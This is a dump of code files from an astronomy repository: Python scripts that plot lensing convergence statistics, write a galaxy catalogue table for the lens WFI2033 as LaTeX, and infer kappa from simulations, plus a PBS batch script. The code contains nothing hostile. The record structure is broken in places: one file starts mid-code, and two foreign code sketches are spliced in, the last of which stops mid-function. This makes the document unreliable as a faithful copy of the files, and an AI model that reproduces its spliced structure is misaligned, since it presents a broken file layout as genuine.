{ "alpha_fraction": 0.5304328799247742, "alphanum_fraction": 0.63150954246521, "avg_line_length": 92.83505249023438, "blob_id": "d768f965b1fde09558c6338d90c4580c4ffbcf4b", "content_id": "ef432f83fdd4b417f6e117dd902f3898b3e15164", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9102, "license_type": "no_license", "max_line_length": 377, "num_lines": 97, "path": "/python/plot_utilities/plotkappabar_disjointgalgammaoneoverr.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# The code uses the output statistics produced by plotkappacompletestatistics.py/plotkappabiascompletestatistics.py in order to plot bars. Run without arguments. Make sure to uncomment the appropriate ax.set_ylim, ylabel and savefig lines\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport scipy as sp\nfrom scipy.stats import norm\nimport numpy as np\nimport sys\nimport os\nfrom os import system\n\nroot = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/kappa/\"\ndata = np.genfromtxt('%smedstd.dat' % root,dtype=['S1000','f8','f8','f8','f8'])\n\nkappastat = np.array([])\nfor i in range(np.shape(data)[0]):\n    if i == 0:\n        kappastat = np.array([data[i][0],data[i][1],data[i][2],data[i][3],data[i][4]])\n    else:\n        x = np.array([data[i][0],data[i][1],data[i][2],data[i][3],data[i][4]])\n        kappastat = np.c_[kappastat,x]\n\nkappastat_45 = np.c_[ kappastat.T[kappastat[0]=='fiducial_45_gal_45_gamma_22.5_med_increments4_4_emptymsk.cat'][0][1:].astype(float), # 1-1/r\n                      kappastat.T[kappastat[0]=='fiducial_45_gal_45_gamma_45_oneoverr_45_z_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # z\n                      kappastat.T[kappastat[0]=='fiducial_45_gal_45_gamma_45_oneoverr_45_mass_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass\n                      kappastat.T[kappastat[0]=='fiducial_45_gal_45_gamma_45_oneoverr_45_mass2_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass2\n                      kappastat.T[kappastat[0]=='fiducial_45_gal_45_gamma_45_oneoverr_45_mass3_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass3\n                      kappastat.T[kappastat[0]=='fiducial_45_gal_45_gamma_45_oneoverr_22.5_med_increments4_4_4_emptymsk.cat'][0][1:].astype(float), # 1/r\n                      kappastat.T[kappastat[0]=='fiducial_45_gal_45_gamma_45_oneoverr_45_zoverr_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # z/r\n                      kappastat.T[kappastat[0]=='fiducial_45_gal_45_gamma_45_oneoverr_45_massoverr_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # massoverr\n                      kappastat.T[kappastat[0]=='fiducial_45_gal_45_gamma_45_oneoverr_45_mass2overr_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass2overr\n                      kappastat.T[kappastat[0]=='fiducial_45_gal_45_gamma_45_oneoverr_45_mass3overr_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass3overr\n                      kappastat.T[kappastat[0]=='fiducial_45_gal_45_gamma_45_oneoverr_45_mass2rms_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass2rms\n                      kappastat.T[kappastat[0]=='fiducial_45_gal_45_gamma_45_oneoverr_45_mass3rms_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass3rms\n                      kappastat.T[kappastat[0]=='fiducial_45_gal_45_gamma_45_oneoverr_45_mass2overrrms_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass2overrrms\n                      kappastat.T[kappastat[0]=='fiducial_45_gal_45_gamma_45_oneoverr_45_mass3overrrms_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass3overrrms\n                      kappastat.T[kappastat[0]=='fiducial_45_gal_45_gamma_45_oneoverr_45_flexion_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # flexion\n                      kappastat.T[kappastat[0]=='fiducial_45_gal_45_gamma_45_oneoverr_45_tidal_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # tidal\n                      kappastat.T[kappastat[0]=='fiducial_45_gal_45_gamma_45_oneoverr_45_SIS_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # SIS\n                      kappastat.T[kappastat[0]=='fiducial_45_gal_45_gamma_45_oneoverr_45_SIShalo_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float)] # SIShalo\n\nkappastat_120 = np.c_[ kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_22.5_med_increments4_4_emptymsk.cat'][0][1:].astype(float), # 1-1/r\n                       
kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_120_oneoverr_120_z_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # z\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_120_oneoverr_120_mass_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_120_oneoverr_120_mass2_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass2\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_120_oneoverr_120_mass3_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass3\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_120_oneoverr_22.5_med_increments4_4_4_emptymsk.cat'][0][1:].astype(float), # 1/r\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_120_oneoverr_120_zoverr_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # z/r\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_120_oneoverr_120_massoverr_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # massoverr\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_120_oneoverr_120_mass2overr_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass2overr\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_120_oneoverr_120_mass3overr_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass3overr\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_120_oneoverr_120_mass2rms_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass2rms\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_120_oneoverr_120_mass3rms_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass3rms\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_120_oneoverr_120_mass2overrrms_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass2overrrms\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_120_oneoverr_120_mass3overrrms_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass3overrrms\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_120_oneoverr_120_flexion_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # flexion\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_120_oneoverr_120_tidal_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # tidal\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_120_oneoverr_120_SIS_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # SIS\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_120_oneoverr_120_SIShalo_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float)] # SIShalo\n\nN = 18\nind = 2.5 * np.arange(N) # the x locations for the groups\nwidth = 0.8 # the width of the bars\n\nax = plt.subplot(2,1,1)\n\ncol1 = (kappastat_45[0])\nrects1 = ax.bar(ind + width, col1, width, color='r')\ncol2 = (kappastat_120[0])\nrects2 = ax.bar(ind + 2*width, col2, width, color='b')\n\n#ax.set_ylim([0.00,0.05])\nax.set_ylim([-0.02,0.08])\nax.set_ylabel('median$_\\kappa$')\n#ax.set_ylabel('$\\mathrm{median}_{\\kappa_\\mathrm{med} - \\kappa_\\mathrm{true}}$')\nax.set_xticks(ind + 2*width)\nax.set_xticklabels(('$1-1/r$', '$z$', '$M_\\star$', '$M^2_\\star$', '$M^3_\\star$', '$1/r$', '$z/r$', '$M_\\star/r$', '$M^2_\\star/r$', '$M^3_\\star/r$', '$M^2_{\\star\\mathrm{rms}}$', '$M^3_{\\star\\mathrm{rms}}$', '$M^2_\\star/r_\\mathrm{,rms}$', '$M^3_\\star/r_\\mathrm{,rms}$', '$M_\\star/r^3$', '$M_\\star/r^2$', '$\\sqrt{M_\\star}/r$', '$\\sqrt{M_h}/r$'), fontsize=10, rotation='vertical')\n\nax = plt.subplot(2,1,2)\n\ncol3 
= (kappastat_45[1])\nrects3 = ax.bar(ind + width, col3, width, color='r')\ncol4 = (kappastat_120[1])\nrects4 = ax.bar(ind + 2*width, col4, width, color='b')\n\nax.set_ylim([0,0.08])\nax.set_ylabel('$\\sigma_\\kappa$')\n#ax.set_ylabel('$\\sigma_{\\kappa_\\mathrm{med} - \\kappa_\\mathrm{true}}$')\nax.set_xticks(ind + width)\nax.set_xticklabels(('$1-1/r$', '$z$', '$M_\\star$', '$M^2_\\star$', '$M^3_\\star$', '$1/r$', '$z/r$', '$M_\\star/r$', '$M^2_\\star/r$', '$M^3_\\star/r$', '$M^2_{\\star\\mathrm{rms}}$', '$M^3_{\\star\\mathrm{rms}}$', '$M^2_\\star/r_\\mathrm{,rms}$', '$M^3_\\star/r_\\mathrm{,rms}$', '$M_\\star/r^3$', '$M_\\star/r^2$', '$\\sqrt{M_\\star}/r$', '$\\sqrt{M_h}/r$'), fontsize=10, rotation='vertical')\nax.legend((rects1[0], rects2[0]), ('45 22.5 gal+1/r+$\\gamma$+', '120 22.5 gal+1/r+$\\gamma$+'), bbox_to_anchor=(0.65, 1.4), fontsize=10)\n#ax.legend((rects1[0], rects2[0]), ('45 22.5 gal+1/r+$\\gamma$+', '120 22.5 gal+1/r+$\\gamma$+'), bbox_to_anchor=(0.3, 0.97), fontsize=10)\nplt.subplots_adjust(left=0.15, bottom=0.15, right=0.95, top=0.95, wspace=0.7, hspace=0.7)\nplt.savefig('%skappashistbar-disjointgalgammaoneoverr.png' % root, dpi=250)\n\nplt.clf()\n" }, { "alpha_fraction": 0.5019049048423767, "alphanum_fraction": 0.5699850916862488, "avg_line_length": 73.5308609008789, "blob_id": "75886393df505e18bdb5a2889bcdc2f1d37d42d7", "content_id": "c59a0658efa8d7bcf7ecdae02951159e9d0f85c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6037, "license_type": "no_license", "max_line_length": 717, "num_lines": 81, "path": "/python/catalogue_utilities/tabletotex_Sluse18zMstar.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Takes a table and returns a custom LaTeX version of its content\nimport numpy as np\nimport os\nfrom os import system\nfrom astropy import units as u\nfrom astropy.coordinates import SkyCoord\n\n################## read catalogue\nfilein = '/Users/cerusu/Dropbox/Davis_work/code/WFI2033/rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmagslephareclassifiedF160W.cat'\nra = 2\ndec = 3\nitot = 4\nspec = 40\nz_eazy = 48\nz_inf = 50\nz_sup = 51\nmass_best = 92\nmass_inf = 93\nmass_med = 94\nmass_sup = 95\nclass_eazy = 98\ndata = np.loadtxt(filein,usecols=[ra,dec,itot,spec,z_eazy,z_inf,z_sup,mass_best,mass_inf,mass_med,mass_sup,class_eazy],unpack=False)\nprint np.shape(data)\nra = 0\ndec = 1\nitot = 2\nspec = 3\nz_eazy = 4\nz_inf = 5\nz_sup = 6\nmass_best = 7\nmass_inf = 8\nmass_med = 9\nmass_sup = 10\nclass_eazy = 11\nlens = SkyCoord(308.4253, -47.39528, unit='deg')\nx = SkyCoord(data[:,ra], data[:,dec], unit='deg')\nsep = x.separation(lens).arcsec\ndata = np.c_[data,sep]\nsep = 12\n\n################## impose conditions\n# for missing mass_med take its error bars to be typical for that mag range\nerrbar18 = np.median(data[:,mass_med][(data[:,itot]>15) & (data[:,itot]<18) & (data[:,mass_med]!=-99)] - data[:,mass_inf][(data[:,itot]>15) & (data[:,itot]<18) & (data[:,mass_med]!=-99)])\nerrbar19 = np.median(data[:,mass_med][(data[:,itot]>18) & (data[:,itot]<19) & (data[:,mass_med]!=-99)] - data[:,mass_inf][(data[:,itot]>18) & (data[:,itot]<19) & (data[:,mass_med]!=-99)])\nerrbar20 = np.median(data[:,mass_med][(data[:,itot]>19) & (data[:,itot]<20) & (data[:,mass_med]!=-99)] - data[:,mass_inf][(data[:,itot]>19) & (data[:,itot]<20) & (data[:,mass_med]!=-99)])\nerrbar21 = 
np.median(data[:,mass_med][(data[:,itot]>20) & (data[:,itot]<21) & (data[:,mass_med]!=-99)] - data[:,mass_inf][(data[:,itot]>20) & (data[:,itot]<21) & (data[:,mass_med]!=-99)])\nerrbar22 = np.median(data[:,mass_med][(data[:,itot]>21) & (data[:,itot]<22) & (data[:,mass_med]!=-99)] - data[:,mass_inf][(data[:,itot]>21) & (data[:,itot]<22) & (data[:,mass_med]!=-99)])\nerrbar23 = np.median(data[:,mass_med][(data[:,itot]>21) & (data[:,mass_med]!=-99)] - data[:,mass_inf][(data[:,itot]>21) & (data[:,mass_med]!=-99)])\ndata[:,mass_best][data[:,mass_best] < 0] = 9\ndata[:,mass_best][data[:,mass_med] > 0] = data[:,mass_med][data[:,mass_med] > 0]\ndata[:,mass_inf][(data[:,mass_inf] < 0) & (data[:,itot]>15) & (data[:,itot]<18)] = data[:,mass_best][(data[:,mass_inf] < 0) & (data[:,itot]>15) & (data[:,itot]<18)] - errbar18\ndata[:,mass_inf][(data[:,mass_inf] < 0) & (data[:,itot]>18) & (data[:,itot]<19)] = data[:,mass_best][(data[:,mass_inf] < 0) & (data[:,itot]>18) & (data[:,itot]<19)] - errbar19\ndata[:,mass_inf][(data[:,mass_inf] < 0) & (data[:,itot]>19) & (data[:,itot]<20)] = data[:,mass_best][(data[:,mass_inf] < 0) & (data[:,itot]>19) & (data[:,itot]<20)] - errbar20\ndata[:,mass_inf][(data[:,mass_inf] < 0) & (data[:,itot]>20) & (data[:,itot]<21)] = data[:,mass_best][(data[:,mass_inf] < 0) & (data[:,itot]>20) & (data[:,itot]<21)] - errbar21\ndata[:,mass_inf][(data[:,mass_inf] < 0) & (data[:,itot]>21) & (data[:,itot]<22)] = data[:,mass_best][(data[:,mass_inf] < 0) & (data[:,itot]>21) & (data[:,itot]<22)] - errbar22\ndata[:,mass_inf][(data[:,mass_inf] < 0) & (data[:,itot]>21)] = data[:,mass_best][(data[:,mass_inf] < 0) & (data[:,itot]>21)] - errbar23\ndata[:,mass_sup][(data[:,mass_sup] < 0) & (data[:,itot]>15) & (data[:,itot]<18)] = data[:,mass_best][(data[:,mass_sup] < 0) & (data[:,itot]>15) & (data[:,itot]<18)] + errbar18\ndata[:,mass_sup][(data[:,mass_sup] < 0) & (data[:,itot]>18) & (data[:,itot]<19)] = data[:,mass_best][(data[:,mass_sup] < 0) & (data[:,itot]>18) & (data[:,itot]<19)] + errbar19\ndata[:,mass_sup][(data[:,mass_sup] < 0) & (data[:,itot]>19) & (data[:,itot]<20)] = data[:,mass_best][(data[:,mass_sup] < 0) & (data[:,itot]>19) & (data[:,itot]<20)] + errbar20\ndata[:,mass_sup][(data[:,mass_sup] < 0) & (data[:,itot]>20) & (data[:,itot]<21)] = data[:,mass_best][(data[:,mass_sup] < 0) & (data[:,itot]>20) & (data[:,itot]<21)] + errbar21\ndata[:,mass_sup][(data[:,mass_sup] < 0) & (data[:,itot]>21) & (data[:,itot]<22)] = data[:,mass_best][(data[:,mass_sup] < 0) & (data[:,itot]>21) & (data[:,itot]<22)] + errbar22\ndata[:,mass_sup][(data[:,mass_sup] < 0) & (data[:,itot]>21)] = data[:,mass_best][(data[:,mass_sup] < 0) & (data[:,itot]>21)] + errbar23\ndata = data[data[:,itot] <= 23]\ndata = data[data[:,class_eazy] >= 0]\ndata = data[data[:,sep] <= 120]\ndata[:,z_eazy][data[:,spec] > 0] = data[:,spec][data[:,spec] > 0]\ndata[:,z_inf][data[:,spec] > 0] = data[:,spec][data[:,spec] > 0]\ndata[:,z_sup][data[:,spec] > 0] = data[:,spec][data[:,spec] > 0]\n\nprint np.shape(data)\n\n################## write tex file\nfileout = '/Users/cerusu/GITHUB/H0LiCOW/papers/WFI2033Environment/table_zMstar.tex'\nf = open(fileout,'w')\nfor i in range(np.shape(data)[0]/2):\n f.write('%.5f & $%.5f$ & %.1f & $%.3f_{-%.3f}^{+%.3f}$ & $%.2f_{-%.2f}^{+%.2f}$ & %.5f & $%.5f$ & %.1f & $%.3f_{-%.3f}^{+%.3f}$ & $%.2f_{-%.2f}^{+%.2f}$\\\\\\\\\\n' % 
(data[:,ra][2*i],data[:,dec][2*i],data[:,sep][2*i],data[:,z_eazy][2*i],data[:,z_eazy][2*i]-data[:,z_inf][2*i],data[:,z_sup][2*i]-data[:,z_eazy][2*i],data[:,mass_best][2*i],data[:,mass_best][2*i]-data[:,mass_inf][2*i],data[:,mass_sup][2*i]-data[:,mass_best][2*i], data[:,ra][2*i+1],data[:,dec][2*i+1],data[:,sep][2*i+1],data[:,z_eazy][2*i+1],data[:,z_eazy][2*i+1]-data[:,z_inf][2*i+1],data[:,z_sup][2*i+1]-data[:,z_eazy][2*i+1],data[:,mass_best][2*i+1],data[:,mass_best][2*i+1]-data[:,mass_inf][2*i+1],data[:,mass_sup][2*i+1]-data[:,mass_best][2*i+1]))\nif np.shape(data)[0] % 2 == 1:\n    f.write('%.5f & $%.5f$ & %.1f & $%.3f_{-%.3f}^{+%.3f}$ & $%.2f_{-%.2f}^{+%.2f}$ \\\\\\\\\\n' % (data[:,ra][2*i+2],data[:,dec][2*i+2],data[:,sep][2*i+2],data[:,z_eazy][2*i+2],data[:,z_eazy][2*i+2]-data[:,z_inf][2*i+2],data[:,z_sup][2*i+2]-data[:,z_eazy][2*i+2],data[:,mass_best][2*i+2],data[:,mass_best][2*i+2]-data[:,mass_inf][2*i+2],data[:,mass_sup][2*i+2]-data[:,mass_best][2*i+2]))\nf.close()\n" },
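Illustration (standalone sketch; the helper name is hypothetical and not part of the repository): the two-entries-per-row LaTeX writing pattern used in tabletotex_Sluse18zMstar.py above, written so the odd leftover entry is taken as rows[-1] instead of relying on the loop index 2*i+2 leaking out of the for loop.

def write_two_per_row(rows, fileout):
    # rows: preformatted LaTeX cell strings, one per catalogue entry
    with open(fileout, 'w') as f:
        for i in range(len(rows) // 2):
            f.write('%s & %s\\\\\n' % (rows[2*i], rows[2*i+1]))
        if len(rows) % 2 == 1:
            f.write('%s \\\\\n' % rows[-1])  # leftover entry fills its own row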
str(sys.argv[int(3*i+2)])==\"mass\":\n q_mass=float(sys.argv[int(3*i+3)])\n q_mass_lim=float(sys.argv[int(3*i+4)])\n if str(sys.argv[int(3*i+2)])==\"mass2\":\n q_mass2=float(sys.argv[int(3*i+3)])\n q_mass2_lim=float(sys.argv[int(3*i+4)])\n if str(sys.argv[int(3*i+2)])==\"mass2rms\":\n q_mass2rms=float(sys.argv[int(3*i+3)])\n q_mass2rms_lim=float(sys.argv[int(3*i+4)])\n if str(sys.argv[int(3*i+2)])==\"mass3\":\n q_mass3=float(sys.argv[int(3*i+3)])\n q_mass3_lim=float(sys.argv[int(3*i+4)])\n if str(sys.argv[int(3*i+2)])==\"mass3rms\":\n q_mass3rms=float(sys.argv[int(3*i+3)])\n q_mass3rms_lim=float(sys.argv[int(3*i+4)])\n if str(sys.argv[int(3*i+2)])==\"zoverr\":\n q_zoverr=float(sys.argv[int(3*i+3)])\n q_zoverr_lim=float(sys.argv[int(3*i+4)])\n if str(sys.argv[int(3*i+2)])==\"massoverr\":\n q_massoverr=float(sys.argv[int(3*i+3)])\n q_massoverr_lim=float(sys.argv[int(3*i+4)])\n if str(sys.argv[int(3*i+2)])==\"mass2overr\":\n q_mass2overr=float(sys.argv[int(3*i+3)])\n q_mass2overr_lim=float(sys.argv[int(3*i+4)])\n if str(sys.argv[int(3*i+2)])==\"mass3overr\":\n q_mass3overr=float(sys.argv[int(3*i+3)])\n q_mass3overr_lim=float(sys.argv[int(3*i+4)])\n if str(sys.argv[int(3*i+2)])==\"mass2overrrms\":\n q_mass2overrrms=float(sys.argv[int(3*i+3)])\n q_mass2overrrms_lim=float(sys.argv[int(3*i+4)])\n if str(sys.argv[int(3*i+2)])==\"mass3overrrms\":\n q_mass3overrrm=float(sys.argv[int(3*i+3)])\n q_mass3overrrm_lim=float(sys.argv[int(3*i+4)])\n if str(sys.argv[int(3*i+2)])==\"zmassoverr\":\n q_zmassoverr=float(sys.argv[int(3*i+3)])\n q_gal_lim=float(sys.argv[int(3*i+4)])\n if str(sys.argv[int(3*i+2)])==\"zmass2overr\":\n q_zmass2overr=float(sys.argv[int(3*i+3)])\n q_zmass2overr_lim=float(sys.argv[int(3*i+4)])\nkappa=np.array([])\n#kappa_galonly=np.array([])\n#kappa_noconstr=np.array([])\ncnts=0\nwith open(str(sys.argv[1])) as file:\n for line in file:\n cnts=cnts+1\n if cnts%1000==0:\n print cnts\n ok=1\n #ok_galonly=1\n ID=line.split()[1]\n posx=float(line.split()[3])\n posy=float(line.split()[4])\n q_gal_file=float(line.split()[6])\n q_oneoverr_file=float(line.split()[8])\n q_zweight_file=float(line.split()[10])\n q_mass_file=float(line.split()[12])\n q_mass2_file=float(line.split()[14])\n q_mass2rms_file=float(line.split()[16])\n q_mass3_file=float(line.split()[18])\n q_mass3rms_file=float(line.split()[20])\n q_zoverr_file=float(line.split()[22])\n q_massoverr_file=float(line.split()[24])\n q_mass2overr_file=float(line.split()[26])\n q_mass3overr_file=float(line.split()[28])\n q_mass2overrrms_file=float(line.split()[30])\n q_mass3overrrms_file=float(line.split()[32])\n q_zmassoverr_file=float(line.split()[34])\n q_zmass2overr_file=float(line.split()[36])\n if (q_gal!=0) and ((q_gal_file < (q_gal - q_gal_lim)) or (q_gal_file > (q_gal + q_gal_lim))):\n ok=0\n #ok_galonly=0\n if (q_oneoverr!=0) and ((q_oneoverr_file < (q_oneoverr - q_oneoverr_lim)) or (q_oneoverr_file > (q_oneoverr + q_oneoverr_lim))):\n ok=0\n if (q_zweight!=0) and ((q_zweight_file < (q_zweight - q_zweight_lim)) or (q_zweight_file > (q_zweight + q_zweight_lim))):\n ok=0\n if (q_mass!=0) and ((q_mass_file < (q_mass - q_mass_lim)) or (q_mass_file > (q_mass + q_mass_lim))):\n ok=0\n if (q_mass2!=0) and ((q_mass2_file < (q_mass2 - q_mass2_lim)) or (q_mass2_file > (q_mass2 + q_mass2_lim))):\n ok=0\n if (q_mass2rms!=0) and ((q_mass2rms_file < (q_mass2rms - q_mass2rms_lim)) or (q_mass2rms_file > (q_mass2rms + q_mass2rms_lim))):\n ok=0\n if (q_mass3!=0) and ((q_mass3_file < (q_mass3 - q_mass3_lim)) or (q_mass3_file > (q_mass3 + 
q_mass3_lim))):\n ok=0\n if (q_mass3rms!=0) and ((q_mass3rms_file < (q_mass3rms - q_mass3rms_lim)) or (q_mass3rms_file > (q_mass3rms + q_mass3rms_lim))):\n ok=0\n if (q_zoverr!=0) and ((q_zoverr_file < (q_zoverr - q_zoverr_lim)) or (q_zoverr_file > (q_zoverr + q_zoverr_lim))):\n ok=0\n if (q_massoverr!=0) and ((q_massoverr_file < (q_massoverr - q_massoverr_lim)) or (q_massoverr_file > (q_massoverr + q_massoverr_lim))):\n ok=0\n if (q_mass2overr!=0) and ((q_mass2overr_file < (q_mass2overr - q_mass2overr_lim)) or (q_mass2overr_file > (q_mass2overr + q_mass2overr_lim))):\n ok=0\n if (q_mass3overr!=0) and ((q_mass3overr_file < (q_mass3overr - q_mass3overr_lim)) or (q_mass3overr_file > (q_mass3overr + q_mass3overr_lim))):\n ok=0\n if (q_mass2overrrms!=0) and ((q_mass2overrrms_file < (q_mass2overrrms - q_mass2overrrms_lim)) or (q_mass2overrrms_file > (q_mass2overrrms + q_mass2overrrms_lim))):\n ok=0\n if (q_mass3overrrms!=0) and ((q_mass3overrrms_file < (q_mass3overrrms - q_mass3overrrms_lim)) or (q_mass3overrrms_file > (q_mass3overrrms + q_mass3overrrms_lim))):\n ok=0\n if (q_zmassoverr!=0) and ((q_zmassoverr_file < (q_zmassoverr - q_zmassoverr_lim)) or (q_zmassoverr_file > (q_zmassoverr + q_zmassoverr_lim))):\n ok=0\n if (q_zmass2overr!=0) and ((q_zmass2overr_file < (q_zmass2overr - q_zmass2overr_lim)) or (q_zmass2overr_file > (q_zmass2overr + q_zmass2overr_lim))):\n ok=0\n for item in range(len(listname)):\n if (ID[75:80] in listname[item]) and (\"dat\" in listname[item]):\n kappafileend=listname[item]\n kappafile=\"/Volumes/G-RAIDStudio/simulations/lensing_simulations/\"+kappafileend\n #print ID[75:80],ID,kappafileend\n x=int(round((posx + 0.5*L_field)/L_pix - 0.5))\n y=int(round((posy + 0.5*L_field)/L_pix - 0.5))\n count=int(round((x-1)*4096+y-1))\n if (ok==1):\n with open(kappafile) as kfile:\n l=kfile.readlines()\n kappa=np.append(kappa,[float(l[count].split()[1])])\n\n\n#print \"kappa=\", kappa\nif len(kappa)==0:\n print \"No field satisfies the conditions.\"\nelse:\n print \"Number of kappa elements:\", len(kappa), \" ------ Plotting histogram...\"\n output=str(sys.argv[1])[0:len(str(sys.argv[1]))-4]\n for i in range(len(sys.argv)-1):\n if i>0:\n output=output+\"_\"+str(sys.argv[i+1])\n outputfile=output+\"_kappa.dat\"\n output=output+\".eps\"\n os.system(\"rm %s\" %outputfile)\n for i in range(len(kappa)):\n kout=open('%s' %outputfile,'a')\n kout.write('%s \\n' %kappa[i])\n kout.close()\n BINS=20\n plt.suptitle(r'%s'%output[141:len(output)-4], fontsize=13, y=0.998)\n #x = linspace(0,2,500)\n #plt.subplot(451)\n #n_q, bins_q, patches = plt.hist(q, histtype='step', color='b', label='W4sim', linewidth=0.5, normed=1, bins=BINS, range=[0, rangemax])\n plt.subplot(1,1,1)\n plt.hist(kappa, histtype='step', color='b', label='kappa w/ constr.', linewidth=1, normed=1, bins=BINS, range=[-0.05, 0.2])\n #plt.hist(kappa_galonly, histtype='step', color='r', label='kappa w/ gal constr.', linewidth=1, normed=1, bins=BINS, range=[-0.05, 0.2])\n #plt.hist(kappa_noconstr, histtype='step', color='g', label='kappa w/o constr.', linewidth=1, normed=1, bins=BINS, range=[-0.05, 0.2])\n #plt.hist(kappa_noconstr, histtype='step', color='b', label='kappa w/o constr.', linewidth=0.5, normed=1, bins=BINS, range=[0, rangemax])\n ax=plt.subplot(111)\n s = \"med=%.3f, std=%.3f, cnt=%d\" % (np.average(kappa),np.std(kappa),len(kappa))\n ax.text(0.55, 0.8, s, fontsize=10, color='b',transform=ax.transAxes)\n #text(0.5, 0.5,'matplotlib',horizontalalignment='center',verticalalignment='center',transform = ax.transAxes)\n 
#plt.xlabel(r'$\\zeta_{gal}$', fontsize=15)\n    plt.ylabel(\"Normalized cnts\", fontsize=20)\n    plt.tick_params(axis='x', labelsize=13)\n    plt.tick_params(axis='y', labelsize=13)\n    plt.setp(plt.xticks()[1], rotation=90)\n    plt.legend(bbox_to_anchor=(0.55, 0.7), loc='center left', borderaxespad=0., fontsize=10)\n    #plt.subplots_adjust(top=0.6)\n    #plt.tight_layout()\n    plt.savefig(output, dpi=500)\n    #plt.show()\nprint(\" --- %s seconds ---\" % (time.time() - start_time))\n\nprint 'Done!'\n\n\n" }, { "alpha_fraction": 0.6843910813331604, "alphanum_fraction": 0.7821612358093262, "avg_line_length": 28.149999618530273, "blob_id": "e72b53f12f771ed67d6ea0c5f23725afd752e78e", "content_id": "40d49d69ad81c50e7243cd28fc0b84362b94bcf8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 583, "license_type": "no_license", "max_line_length": 86, "num_lines": 20, "path": "/python/scripts/NAOJ/batch_infersim14.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log14s.out\n#PBS -e Log14s.err\n#PBS -N 14s\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappasimbias.py WFI2033 5 45 23 meds gal gamma oneoverr mass2overrrms\npython inferkappasimbias.py WFI2033 5 120 23 meds gal gamma oneoverr mass2overrrms\npython inferkappasimbiasphil.py WFI2033 5 45 23 meds gal gamma oneoverr mass2overrrms\npython inferkappasimbiasphil.py WFI2033 5 120 23 meds gal gamma oneoverr mass2overrrms\n" },
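Illustration (hypothetical generator, not in the repository): PBS job scripts like batch_infersim14.sh above differ only in job tag, working directory and command list, so a family of them could be produced from one template rather than edited by hand; the template fields and the write_pbs_script helper below are assumptions.

import os

PBS_TEMPLATE = """#!/bin/sh
#PBS -r y
#PBS -m abe
#PBS -q q1m
#PBS -o Log{tag}.out
#PBS -e Log{tag}.err
#PBS -N {tag}
#PBS -l mem=16gb

# Go to this job's working directory
cd $PBS_O_HOME

# Run your executable
cd {workdir}

{commands}
"""

def write_pbs_script(tag, workdir, commands, outdir='.'):
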